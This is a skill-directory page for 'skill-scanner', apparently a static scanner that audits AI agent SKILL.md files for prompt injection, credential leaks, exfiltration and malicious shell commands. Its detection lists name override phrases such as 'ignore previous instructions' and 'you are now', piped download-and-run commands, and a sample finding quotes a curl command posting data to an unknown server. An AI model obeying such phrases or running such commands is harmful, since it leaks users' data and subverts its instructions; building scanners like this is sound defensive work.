skill-scanner
Security scanner for AI agent skills (SKILL.md files and associated scripts). Use when a user wants to audit, scan, or verify the security of any SKILL.md file, skill package, or agent skill before installation. Detects prompt injection, credential exposure, data exfiltration, malicious payloads, suspicious shell commands, remote code execution, and supply-chain risks. Triggers on mentions of "scan skill", "check skill security", "audit skill", "is this skill safe", or when a user shares a SKILL.md file for review.
Best use case
skill-scanner is best used when you need a repeatable AI agent workflow instead of a one-off prompt.
Security scanner for AI agent skills (SKILL.md files and associated scripts). Use when a user wants to audit, scan, or verify the security of any SKILL.md file, skill package, or agent skill before installation. Detects prompt injection, credential exposure, data exfiltration, malicious payloads, suspicious shell commands, remote code execution, and supply-chain risks. Triggers on mentions of "scan skill", "check skill security", "audit skill", "is this skill safe", or when a user shares a SKILL.md file for review.
Teams using skill-scanner should expect a more consistent output, faster repeated execution, less prompt rewriting.
When to use this skill
- You want a reusable workflow that can be run more than once with consistent structure.
When not to use this skill
- You only need a quick one-off answer and do not need a reusable workflow.
- You cannot install or maintain the underlying files, dependencies, or repository context.
How skill-scanner Compares
| Feature / Agent | skill-scanner | Standard Approach |
|---|---|---|
| Platform Support | Not specified | Limited / Varies |
| Context Awareness | High | Baseline |
| Installation Complexity | Unknown | N/A |
Frequently Asked Questions
What does this skill do?
Security scanner for AI agent skills (SKILL.md files and associated scripts). Use when a user wants to audit, scan, or verify the security of any SKILL.md file, skill package, or agent skill before installation. Detects prompt injection, credential exposure, data exfiltration, malicious payloads, suspicious shell commands, remote code execution, and supply-chain risks. Triggers on mentions of "scan skill", "check skill security", "audit skill", "is this skill safe", or when a user shares a SKILL.md file for review.
Where can I find the source code?
You can find the source code on GitHub using the link provided at the top of the page.
Related Guides
SKILL.md Source
# Skill Scanner
A security scanner that analyzes AI agent skills for vulnerabilities, malicious behavior, and supply-chain risks before you install them.
## Overview
AI agent skills are powerful — they extend what agents can do by providing instructions, scripts, and tool integrations. But that power comes with serious risk. Research from Snyk, Cisco, VirusTotal, and others has shown that a significant percentage of community-published skills contain critical security flaws, from exposed credentials to outright malware delivery.
This skill scans SKILL.md files and their associated scripts/resources to detect threats before they reach your system.
## When to Use This Skill
- Before installing any community skill from ClawHub, skills.sh, or GitHub
- When reviewing a pull request that adds or modifies a skill
- To audit skills already installed in your agent environment
- When a user shares a SKILL.md and asks "is this safe?"
- For periodic security audits of your skill library
## Quick Start
To scan a skill, run:
```bash
python3 scripts/scan_skill.py /path/to/skill-directory
```
Or scan just a SKILL.md file:
```bash
python3 scripts/scan_skill.py /path/to/SKILL.md
```
Or scan from a URL:
```bash
python3 scripts/scan_skill.py --url https://raw.githubusercontent.com/user/repo/main/skills/my-skill/SKILL.md
```
The scanner outputs a structured JSON report and a human-readable summary.
## What It Detects
The scanner uses a multi-layer detection approach across five security categories:
### 1. Prompt Injection Detection
- Direct injection patterns ("ignore previous instructions", "override system prompt")
- Indirect injection via fetched content (URLs in instructions that could be modified)
- Role manipulation ("you are now", "act as", "pretend to be")
- Safety bypass attempts ("do not refuse", "skip safety checks", "ignore guidelines")
- Hidden instruction embedding (Unicode tricks, zero-width characters, base64 in markdown)
### 2. Credential & Data Exposure
- Hardcoded API keys, tokens, passwords in SKILL.md or scripts
- Instructions that tell agents to pass credentials through the LLM context window
- Patterns that log, print, or output secrets in plaintext
- Environment variable harvesting ($API_KEY, $SECRET, .env file access)
- OAuth token handling without proper scoping
### 3. Data Exfiltration & Network Risks
- Outbound HTTP/curl calls to unknown or suspicious domains
- Silent network requests (requests without user notification)
- Webhook/callback patterns that send data to external servers
- DNS exfiltration patterns
- Base64-encoded URLs or obfuscated endpoints
### 4. Malicious Code Execution
- Shell command injection (eval, exec, subprocess with user input)
- Remote code download and execution patterns
- Binary download instructions (wget/curl piped to sh/bash)
- Obfuscated scripts (base64 decode | bash, encoded payloads)
- File system manipulation (writing to startup dirs, cron jobs, PATH modification)
- Package installation from untrusted sources
### 5. Supply-Chain & Trust Issues
- Remote markdown fetching (instructions loaded from external URLs)
- Dependency on unverified packages or repos
- Version pinning issues (unpinned dependencies that can be hijacked)
- Typosquatting indicators (skill names similar to popular skills)
- Missing or suspicious author metadata
## Severity Levels
Each finding is classified:
| Level | Meaning | Action |
|-------|---------|--------|
| 🔴 CRITICAL | Active malware, confirmed exfiltration, or remote code execution | **Do NOT install. Report immediately.** |
| 🟠 HIGH | Credential exposure, suspicious shell commands, silent network calls | **Do not install without thorough manual review.** |
| 🟡 MEDIUM | Remote content fetching, broad permissions, unverified dependencies | **Review carefully. Understand the risk before proceeding.** |
| 🔵 LOW | Minor hygiene issues, missing metadata, best-practice violations | **Note and fix when possible.** |
| ✅ INFO | Observations and context, not vulnerabilities | **No action needed.** |
## Scan Output
The scanner produces two outputs:
### 1. JSON Report (`scan-report.json`)
```json
{
"skill_name": "example-skill",
"scan_timestamp": "2026-02-10T12:00:00Z",
"overall_risk": "HIGH",
"total_findings": 5,
"findings_by_severity": {
"CRITICAL": 0,
"HIGH": 2,
"MEDIUM": 2,
"LOW": 1
},
"findings": [
{
"id": "EXFIL-001",
"severity": "HIGH",
"category": "data_exfiltration",
"title": "Silent outbound HTTP request to unknown domain",
"description": "SKILL.md instructs the agent to send a curl request to https://unknown-server.com/collect without informing the user.",
"file": "SKILL.md",
"line": 42,
"evidence": "curl -s https://unknown-server.com/collect -d \"$DATA\"",
"recommendation": "Remove or replace with a known, trusted endpoint. Ensure all network calls are transparent to the user."
}
],
"files_scanned": ["SKILL.md", "scripts/setup.sh", "scripts/helper.py"],
"scan_duration_ms": 340
}
```
### 2. Human-Readable Summary
Printed to stdout with color-coded severity and actionable recommendations.
## Workflow
When a user asks you to scan a skill:
1. **Locate the skill** — Identify the SKILL.md and any associated files (scripts/, references/, assets/)
2. **Run the scanner** — Execute `scripts/scan_skill.py` on the skill directory
3. **Review findings** — Read the JSON report and summarize findings for the user
4. **Provide recommendations** — Based on severity, advise the user on whether to install, review further, or reject
5. **If CRITICAL findings** — Strongly advise against installation and explain the specific threat
## Integration with CI/CD
The scanner can be integrated into GitHub Actions or any CI pipeline:
```yaml
- name: Scan Skills
run: |
python3 skill-scanner/scripts/scan_skill.py ./skills/ --recursive --format json --output scan-results.json
python3 skill-scanner/scripts/scan_skill.py ./skills/ --recursive --fail-on high
```
Use `--fail-on <severity>` to fail the pipeline if findings at or above that severity are detected.
## Limitations
This scanner is a first line of defense, not a silver bullet:
- It uses pattern matching and heuristics — sophisticated obfuscation may evade detection
- It cannot evaluate runtime behavior (only static analysis)
- It does not replace manual code review for high-risk skills
- Natural language prompt injection payloads may require LLM-based semantic analysis (future enhancement)
For maximum security, combine this scanner with manual review, sandboxed execution, and network monitoring.
## References
- `references/detection-rules.md` — Full catalog of detection patterns and rule IDs
- `scripts/scan_skill.py` — Main scanner script
- `scripts/rules.py` — Detection rules engineRelated Skills
board-scanner
Board scanning and dispatch procedure for GitHub Projects v2. Scans the project board for actionable issues, handles auto-advance transitions, and dispatches work to specialized hats via priority tables. Auto-injected into coordinator prompts.
code-safety-scanner
Scan any codebase for 14 critical safety issues across security vulnerabilities, server stability (500 errors), and payment misconfigurations. Use when auditing code before deployment, reviewing AI-generated code for production readiness, or...
skill-scanner
Scan OpenBot/Clawdbot skills for security vulnerabilities, malicious code, and suspicious patterns before installing them. Use when a user wants to audit a skill, check if a ClawHub skill is safe, scan for credential exfiltration, detect prompt injection, or review skill security. Triggers on security audit, skill safety check, malware scan, or trust verification.
Heimdall - Security Scanner for AI Agent Skills
Scan OpenClaw skills for malicious patterns before installation. Context-aware scanning with AI-powered narrative analysis.
ultimate-fork-and-skill-scanner
Scan GitHub forks and ClawHub skills for valuable changes, innovations, and enhancements.
fork-and-skill-scanner-ultimate
Scan 1,000 GitHub forks per run.
network-scanner
Scan networks to discover devices, gather MAC addresses, vendors, and hostnames. Includes safety checks to prevent accidental scanning of public networks.
security-scanner
Automated security scanning and vulnerability detection for web applications, APIs, and infrastructure.
security-skill-scanner
Security scanner for ClawdHub skills - detects suspicious patterns, manages whitelists, and monitors Moltbook for security threats.
heartbeat-scanner
Validate your agent nature through SHACL-based heartbeat analysis.
vulnerability-scanner
Advanced vulnerability analysis for OWASP 2025, supply chain security, attack surface mapping, and risk prioritization.
skill-threat-scanner
Scan OpenClaw skills for malware, prompt injection, reverse shells, wallet theft, supply chain attacks, and data.